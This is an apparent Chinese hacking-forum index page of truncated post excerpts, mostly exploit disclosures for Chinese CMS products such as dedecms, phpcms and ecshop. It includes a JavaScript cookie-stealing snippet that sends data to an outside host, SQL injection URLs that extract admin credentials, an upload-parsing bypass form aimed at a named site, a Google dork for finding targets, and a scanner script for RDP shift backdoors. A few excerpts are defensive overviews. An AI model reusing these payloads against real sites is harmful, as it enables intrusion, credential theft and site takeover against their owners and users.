电脑病毒论坛 今日: 0|主题: 1421|排名: 18 

国内最专业的ASP网站内容管理系统-小游戏管理系统，他将是您轻松建站的首选利器。小游戏CMS系统对站点管理和创造编辑都有好处，无论是CMS系统的易用性和功能的完善性，都处于领先优势！网站的编辑、发布、管理人员可轻松便捷的通过小游戏CMS系统来提交修改、审批、发布内容。　　[xyxcms] 　　版本信息：V1.3 正式版 　　软 ...

　　Js里可以写shell，添加用户，偷取COOKIE然后模拟出真正的转向 　　xmlhttp=poster(); 　　cookie=document.cookie; 　　login=cookie.indexOf(‘password’)==-1?0:1; 　　tolocation=’https://www.jb51.net/’; 　　//get cookie 　　x=new Image(); 　　x.src=”www.dosjj.com/c.php?c=&rd ...

　　第一个 　　简要描述：由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限 　　详细说明：http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 　　漏洞证明：http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1 　　h ...

　　影响版本：AWBS 2.9.2 　　官方网站：http://www.awbs.com 　　漏洞类型：SQL注入 　　漏洞描述： 　　---Vulnerability--- 　　http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL] 　　============================================================================================= 　　---PoC Usi ...

　　影响版本：phpcms v9 blind 　　官方网站：http://www.phpcms.cn 　　漏洞类型：SQL注入 　　漏洞描述：phpcms v9 blind 参数过滤存在SQL注入漏洞。 　　google dork:inurl:"index.php?m=content+c=rss+catid=10" 　　exploit & p0c 　　[!] index.php?m=content&c=rss&catid=[valid catid] 　　Example p0c 　　[!] ht ...

　　今天日站发现的.... 　　http://www.xxx.net/manage/Modle/UploadFile/ListFiles.aspx 上传洞洞 　　上传后没改文件名!可以IIS解析 　　后面的事,你懂的~ 　　有点像FCK ... 　　我晕了...这程式漏洞真多 　　刚又发现了...有点像shell的管理界面 可以修改 新建 等等功能~ 　　http://www.xxx.com/manage/Modle/Templat ...

　　续本地包含 　　include/arc.datalist.class.php 　　$codefile = (isset($needCode) ? $needCode : $cfg_soft_lang); 　　if(file_exists(DEDEINC.'/code/datalist.'.$codefile.'.inc')) 　　{ 　　require_once(DEDEINC.'/code/datalist.'.$codefile.'.inc'); 　　} 　　包含这个文件即可包含 .inc 类型文件， 　　而 ...

　　有时在通过注射得到织梦程序的管理密码时，却发现找不到后台地址。。 　　这个时候 大家可以尝试下在地址后面加上：/include/dialog/select_media.php?f=form1.murl 　　但不一定通杀。。  

　　以下版本没测试 测试的是最新版本 　　在公布前几小时没有通知官方 ^_^ 哈哈 　　为什么说过程精彩呢? 看完就明白! 　　因为这个漏洞原因非一般! 同时映射出中国软件行业的悲哀!!! 　　经典对白 看代码 　　后台登录文件 　　adminModulesAuthIndex.php 　　 　　if ( defined( "EXCMS" ) ) //在admin/index.php里有了 ...

　　影响版本: 　　dedecms织梦5.5 　　漏洞描述: 　　demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=&ageNo=2demo2:http://www.dedecms.com/plus/list.php?tid=6&TotalResult=&nativeplace=0&infotype=0&keyw ...

　　最新dedecms 5.6的注入代码： 　　http://www.dedecms.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=1

　　ecshop爆绝对路径的bug 　　网址如下" 　　http://www.zzfhw.com/ECShop/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-ｓｃｒｉｐｔs/spellchecker.php  

　　PHP网页的安全性问题 　　针对PHP的网站主要存在下面几种攻击方式: 　　1.命令注入(Command Injection) 　　2.eval注入(Eval Injection) 　　3.客户端脚本攻击(ｓｃｒｉｐｔ Insertion) 　　4.跨网站脚本攻击(Cross Site ｓｃｒｉｐｔing, XSS) 　　5.SQL注入攻击(SQL injection) 　　6.跨网站请求伪造攻击(Cross Site ...

先访问这个地址 Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp 访问这个地址可以建立个A.ASP的文件夹…… 再用这个html代码上传。 <form action="http://www.zzfhw.com/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=post name=myform enctype="m ...

　　首发：红科网安 　　作者：Amxking 　　漏洞程序：dedecms5.5 　　测试对象：织梦网CMS官方网站 　　提交时间：2010-03-17 　　漏洞类型：信息泄露 　　危险等级：低 　　漏洞描述： 　　dedecms 5.5程序泄露网站路径信息。 　 　　测试地址： 　　http://www.dedecms.com/plus/paycenter/alipay/return_url.php 　　ht ...

config_global.php 复制代码代码如下: 　　$_config['cache']['type'] = ‘file’; 　　function cachedata($cachenames) { 　　…… 　　$isfilecache = getglobal(‘config/cache/type’) == ‘file’; 　　…… 　　if($isfilecache) { 　　$lostcaches = array( ...

SQL注入的原理 以往在Web应用程序访问数据库时一般是采取拼接字符串的形式，比如登录的时候就是根据用户名和密码去查询： string sql = "SELECT TOP 1 * FROM [User] WHERE UserName = '" + userName + "' AND Password = '" + password + "'"; 其中userName和password两个变量的值是由用户输入的。在userName和password都 ...

我们遇到的入侵方式大概包括了以下几种： 　　(1) 被他人盗取密码； 　　(2) 系统被木马攻击； 　　(3) 浏览网页时被恶意的java scrpit程序攻击； 　　(4) QQ被攻击或泄漏信息； 　　(5) 病毒感染； 　　(6) 系统存在漏洞使他人攻击自己。 　　(7) 骇客的恶意攻击。 　　下面我们就来看看通过什么样的手段来更有效的防范攻 ...

首先3389的SHIFT后门极少 其次大部分SHIFT后门都加密 所以手工一个一个尝试是挺傻的，写成自动扫描的话，还能让人忍受 需要用到的工具 roboclientsmclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d shift_backdoor.txt： job { connect("","","",1,1); sleep(2000); senddata("WM_KEYDOWN",16,2752513); senddat ...

入侵是指未授权的非法进入，而安全检测是授权的检测！对自己的程序进行测试，当然是调试或者是安全检测了！这次就把自己对程序的测试过程发出来！因为是利用程序中的漏洞，在这利用的是SQL注入！我们要进行SQL注入！首先要找注入点了  我们要对这个程序进行测试！注入吗？要找注入点，我们找一篇文章  看到这个 ...